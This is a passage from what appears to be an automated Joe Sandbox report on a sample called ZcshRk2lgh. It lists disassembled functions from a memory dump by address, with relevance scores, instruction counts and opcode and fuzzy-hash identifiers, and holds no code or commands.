                                                                  • Opcode Fuzzy Hash: ea599a3a03f842830324d6cfdf98c05e5af869c66c0028075a49e40502fbf4b1
                                                                  • Instruction Fuzzy Hash: BD11BC76A01209DBCF25CF9AD590E5ABBF8EB98650B03407FD9059B324E634DD05CBA0
                                                                  Function 0156A8E4 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction ID: 300eb63bcdabc9110698d9dff879dc0f2beae0868e9557501a6d6bda83b93abb
                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction Fuzzy Hash: D911E236A0090AAFDB19CB58C801A9DBBF9FF84210F158269E845AB340E671AD41CBC0
                                                                  Function 014A0AD0 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction ID: 60d82ef56e74a9f0bda6e1eaba93e4c1918b6c3101da2c419a8524bca03d6af9
                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction Fuzzy Hash: 312106B5A00B059FD3A0CF29C580B52BBF4FB58B20F50492EE98AC7B50E371E814CB90
                                                                  Function 0152E7E1 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction ID: 318d7f103c4962d93d3bd957fb3633a9c60b22722fe81bc64c8c37a4543789e2
                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction Fuzzy Hash: 2311C133600611EFE7219F49C852B5ABBE5FB53754F06842DE9889F1A0D7B0DC41C790
                                                                  Function 014C27ED Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 530df2b07b6c9b085e8e19fea8f8ccf82a3ea28ce08bd1430e982970830553e8
                                                                  • Instruction ID: 4c9f8d791df07ecfc407800b646d1a5eb12bd531e64ce5062ef47fad79228544
                                                                  • Opcode Fuzzy Hash: 530df2b07b6c9b085e8e19fea8f8ccf82a3ea28ce08bd1430e982970830553e8
                                                                  • Instruction Fuzzy Hash: 5E010436245646ABE327A6AEDC94F6B7B8CFF90A50F05006AF9008F2A1D9B4DC01C271
                                                                  Function 014A4690 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a24d8ccf20abc74e74463a43d266868aa073b1dc5e3852b89bc7d3107470c71a
                                                                  • Instruction ID: 7dd78fe91da7565c955040242a10e73f22e0dc315f980c37baf4f2ab8a7896f9
                                                                  • Opcode Fuzzy Hash: a24d8ccf20abc74e74463a43d266868aa073b1dc5e3852b89bc7d3107470c71a
                                                                  • Instruction Fuzzy Hash: 4D11917A2016859FEB25CF5DD840B5A7FA8EBA5A64F5E411BF9148B770C3B0E800CF60
                                                                  Function 014D6620 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 090db3924c0291a6c966c627d0f4b740c4c9db71c90b314525ceff4bc265aecb
                                                                  • Instruction ID: d3f562e08eb41c674ad07108717d4dea6f6141c027db631a8325104d78cb49a1
                                                                  • Opcode Fuzzy Hash: 090db3924c0291a6c966c627d0f4b740c4c9db71c90b314525ceff4bc265aecb
                                                                  • Instruction Fuzzy Hash: 0F118272A00615ABDF21DF5AC9D0B5EFBB8FF94750F52045ADA05AB320D730AD058B60
                                                                  Function 014CEA2E Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70b431f35629cb61bad194966db3fe7d7a3790e096477bcf29ff94d71deb7845
                                                                  • Instruction ID: eb18413a896d0445289b53b7e57b9797407b28979537c4767778ec1eee24d08f
                                                                  • Opcode Fuzzy Hash: 70b431f35629cb61bad194966db3fe7d7a3790e096477bcf29ff94d71deb7845
                                                                  • Instruction Fuzzy Hash: 6701CC755202099FC726DB2AD448E26BBF9FBA5714F22816FE1049B270E770AC46CB90
                                                                  Function 014CE53E Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction ID: edba3a42f0f88ae7366a6b32d98e1a30d0059b0e9c9d393670ca0aed08027165
                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction Fuzzy Hash: C111E9752016C19BEB339B9DC944B693BD8BB50B44F1908A7DD419F7A2F338C843C260
                                                                  Function 0152E75D Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                  • Instruction ID: 7b05e588766b7728bbb888ad44cd7e0f0b8ab202eb451d8c8da1021a6a9a7b21
                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                  • Instruction Fuzzy Hash: 1901D637600156AFEB215F59C802F5A7AA9FB92750F198425EA059F1B0D771DD40C790
                                                                  Function 0149A250 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction ID: 4cb4d93da62901d5f364a6ba8eda5b57caacf6664c8a2a321287482be7f53ea1
                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction Fuzzy Hash: 83010032404B229BCF218F1A9840A237FB4EB55B607108AAEF8958B3A1C331D801CBA0
                                                                  Function 0151E1D0 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4da9b215f993415d7386c0611fbfb3f451ae09fc08969e58d7ad5b9f4489dd45
                                                                  • Instruction ID: ff6edcbff744aa7b0255e026737570d50baeb02a3a5f06d7b5cd5b9b8e86d887
                                                                  • Opcode Fuzzy Hash: 4da9b215f993415d7386c0611fbfb3f451ae09fc08969e58d7ad5b9f4489dd45
                                                                  • Instruction Fuzzy Hash: 3B118E36241241EFDB16AF1AC991F567BB8FF68B84F10006AED059F661C235ED01CA90
                                                                  Function 014A6259 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 173ba6b34665a903c9026a0b3ae77bd839f21a463024f6abfca22b4c7e7e9fde
                                                                  • Instruction ID: a59de22b246a18e4228eaf8baca7437396218030fdb019ed22c040c3d0a3e734
                                                                  • Opcode Fuzzy Hash: 173ba6b34665a903c9026a0b3ae77bd839f21a463024f6abfca22b4c7e7e9fde
                                                                  • Instruction Fuzzy Hash: 7E119E71901218ABDF25AF65CC41FE972B8BB24710F5041DAA314A61F0D6B09E81CF84
                                                                  Function 01526050 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c0d605fb748c4145e735097189ac7bbeb48b71ee6611bdd0e611db872b66d05
                                                                  • Instruction ID: 8b1b08fe30df440edaf4d32b5d275586184f758b6a5a9b9a21b3d6586584a5f4
                                                                  • Opcode Fuzzy Hash: 1c0d605fb748c4145e735097189ac7bbeb48b71ee6611bdd0e611db872b66d05
                                                                  • Instruction Fuzzy Hash: C0111773900119ABCB12DB95CC84DDFBBBCEF58254F054166E906A7211EA34AA15CBE0
                                                                  Function 014A208A Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction ID: 111ff6d1b98e00df69e0844f24e51ae2d9d52c13e6824dbb8925fdc2660e4281
                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction Fuzzy Hash: AB01F5736041119BEF118E59D880F93776BBFE4600F9644ABEE018F366DAB1C881D390
                                                                  Function 01536500 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d22dae921eb789394a0efbd5feb596c9c9ae1fe1c17168717add0f1fa359309f
                                                                  • Instruction ID: ad2c1e9363a262f7ee6329860ad02f2526e47c4e0365b8699e6bf966d742377e
                                                                  • Opcode Fuzzy Hash: d22dae921eb789394a0efbd5feb596c9c9ae1fe1c17168717add0f1fa359309f
                                                                  • Instruction Fuzzy Hash: 4411E132600146AFC701CF28C840BA6BBB9FB9A314F488169E848CF355D732ED80CBA1
                                                                  Function 0152C810 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f462f7a9ebddda2d3b785296f9e8ed92591cdfa856a3f0a69a0567460c165da
                                                                  • Instruction ID: 07abe78d7a76ad87f9861bf96281d28da70c362a4e9b8ce7bc8142719ce936dd
                                                                  • Opcode Fuzzy Hash: 8f462f7a9ebddda2d3b785296f9e8ed92591cdfa856a3f0a69a0567460c165da
                                                                  • Instruction Fuzzy Hash: 6B111CB1A002199BCB00DF9AD585AAEBBF8FF58350F14806AE905E7351D674EA018BA4
                                                                  Function 0154EA60 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03292680bc5ed5591469e471ae95f88f54397ebd9f54587ec08fb0e29c264113
                                                                  • Instruction ID: c394a41c7e9883c1ce213a9a97e19e1c47f81159f48144ff951ff0a7ee2eadf1
                                                                  • Opcode Fuzzy Hash: 03292680bc5ed5591469e471ae95f88f54397ebd9f54587ec08fb0e29c264113
                                                                  • Instruction Fuzzy Hash: 5B01D831140211DBCB32AF278489D7EBBF9FF61654B05482EE1555F611C7B4EC41CBA1
                                                                  Function 0149C020 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction ID: 342fa4a48da69243ba0cf27ee1b36e5acba9082953e73bcaa189b08119ccd591
                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction Fuzzy Hash: 3C0128326007459FEF22DAABC844EA77BE9FFD6210F04481FE6468B760DA70E402C760
                                                                  Function 014E20F0 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 841f39b9da0635ef53ffcccd7c3bd99ea3648ad23f444992e4a3c6b941bf91e9
                                                                  • Instruction ID: 3de09be633389eda3cfeac5d8b7f65b21352db158248ea13b4ee08c6ab781a25
                                                                  • Opcode Fuzzy Hash: 841f39b9da0635ef53ffcccd7c3bd99ea3648ad23f444992e4a3c6b941bf91e9
                                                                  • Instruction Fuzzy Hash: 56116D35A0124DABDF16EFA5C854EAEBBB9FB54740F00405AE9019B2A0D735EE11CB90
                                                                  Function 014DE5CF Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38ddd2127bef35264f9d1ba4a5894f242ef10060c4ea2d29e9114a74631b6624
                                                                  • Instruction ID: 076516d7c9f6f1d5f3126a5beb5ac87096ddccd657fada9100339b4f2c1c8be5
                                                                  • Opcode Fuzzy Hash: 38ddd2127bef35264f9d1ba4a5894f242ef10060c4ea2d29e9114a74631b6624
                                                                  • Instruction Fuzzy Hash: 46018472201911BBD711AF6ACDC4E97BBACFB656A4700052EB10597561DB74FC11C6F0
                                                                  Function 015369C0 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d19b892c290d13a1fc7323ee53558b1f717b2f75c13727c416ff71a407f1bce
                                                                  • Instruction ID: 45e584eb14de069cbfccacf9b2cf7d59b820d99f8de5eaff58c04fa2f68c9d75
                                                                  • Opcode Fuzzy Hash: 0d19b892c290d13a1fc7323ee53558b1f717b2f75c13727c416ff71a407f1bce
                                                                  • Instruction Fuzzy Hash: 2E014032214201EBD320DF6AC88896BBBE8FF94620F11451DE9548B190D7309902C7D1
                                                                  Function 0152C460 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bf0db64c7f45f65a3eaf8eeab6954b15f520c7843851cbad0bb45ba4413e1e6
                                                                  • Instruction ID: 07a47fe06503b8d38c30186aedb8365c745fa5064b1a64127fa72f014ab5d901
                                                                  • Opcode Fuzzy Hash: 3bf0db64c7f45f65a3eaf8eeab6954b15f520c7843851cbad0bb45ba4413e1e6
                                                                  • Instruction Fuzzy Hash: 1B115B71A00219ABDF15EF69C844EAE7BB5FB59340F00405AF9019B391DA35E911CB90
                                                                  Function 0152C97C Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c87c8d3efd3ca9c13291e65740bbf7acc85904845340fb87eeeb666b10f18ecd
                                                                  • Instruction ID: 20e0ea60c1efcb1f34f5ec564e0c3c7eb88ab7d57cd32ddbe65ef0c478db1daf
                                                                  • Opcode Fuzzy Hash: c87c8d3efd3ca9c13291e65740bbf7acc85904845340fb87eeeb666b10f18ecd
                                                                  • Instruction Fuzzy Hash: 16115AB16043049FC700DF6AD44195BBBE4BF99710F00495FF998D73A1D630E900CB92
                                                                  Function 0152CA11 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3c29b39d3f7763043ece492ba128dfe1995150865af46a29ca907a60bca025e
                                                                  • Instruction ID: 93225fe4cc893d9297a67643837a2295e44db0faf7191b1026dcd7293f850a88
                                                                  • Opcode Fuzzy Hash: d3c29b39d3f7763043ece492ba128dfe1995150865af46a29ca907a60bca025e
                                                                  • Instruction Fuzzy Hash: B1115AB16043049FC710DF6AD44195EBBE4BF99750F00495EF958DB3A1E670E900CB92
                                                                  Function 01574A80 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                  • Instruction ID: 630d4f3f63b715ce68d4be95b9d133e25962f8f406923e4e10d37eca356fa10a
                                                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                  • Instruction Fuzzy Hash: 9301D8326006019FD721EA59E845F9AB7EBFBC5610F04481DE6428F650DAB0F841C794
                                                                  Function 014BE016 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction ID: 244a039024d9a7dcd3b506f1e1e559150df5db44d7d0ff91e9e91f5f0ef0d9b9
                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction Fuzzy Hash: 69017C722005909FE3228A1DC988FA77BE8EB89754F0904A6FA05DB7B2D638DC41C621
                                                                  Function 0149826B Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d30037a61434efdbaf0889f42de6d2643d69a901633e48299d7f0f20d9d7cc11
                                                                  • Instruction ID: 16b04425dd6cf1098161b198b9a9b63a3ed6aeb9d32ae3ef90abf46951f5e54b
                                                                  • Opcode Fuzzy Hash: d30037a61434efdbaf0889f42de6d2643d69a901633e48299d7f0f20d9d7cc11
                                                                  • Instruction Fuzzy Hash: A901A73270090ADFDB14EB6ED8449BF7BA9FF92610B1640ABD901DB7A0DE30DD06C691
                                                                  Function 0154EB50 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 9f234986004e08594ab8c2dfa6c32a85f8c6a9bd9d9e3124e255a770a0909b24
                                                                  • Instruction ID: 695b6dc64d754fcd902a5ed6a92162cba86d228156354e43fd6103bb0218aad5
                                                                  • Opcode Fuzzy Hash: 9f234986004e08594ab8c2dfa6c32a85f8c6a9bd9d9e3124e255a770a0909b24
                                                                  • Instruction Fuzzy Hash: 2401A271240701AFD7315F1AD942F4ABAF8FF65B54F01482EB3069F3A0D6F5A8418BA5
                                                                  Function 014A2582 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59781b4602ee29e39a0e696eb1aeae1a3920539a4fb3c0709173efb3672bf303
                                                                  • Instruction ID: c2a2405ded65429013ace688394238d7833f64b353b615d69d52434d5c292c80
                                                                  • Opcode Fuzzy Hash: 59781b4602ee29e39a0e696eb1aeae1a3920539a4fb3c0709173efb3672bf303
                                                                  • Instruction Fuzzy Hash: 51F0A933641611B7C732DF57CD40F57BAAAFBA4A90F15402EA60597660D670ED01D6B0
                                                                  Function 014CC073 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction ID: 4a6da8c5b4c415a6dda196a69295bf5ae1e5e10e79468c170d31498e2f0e9ab7
                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction Fuzzy Hash: 7AF0C2F2600611ABD324CF8EDC80E57FBEADBD1A90F04812DA509CB320EA31ED04CB90
                                                                  Function 0149C310 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction ID: 6c777bec1bbe253225f4be0981e3675bb02c86abbc4cc6dc208b4f27f851fb9d
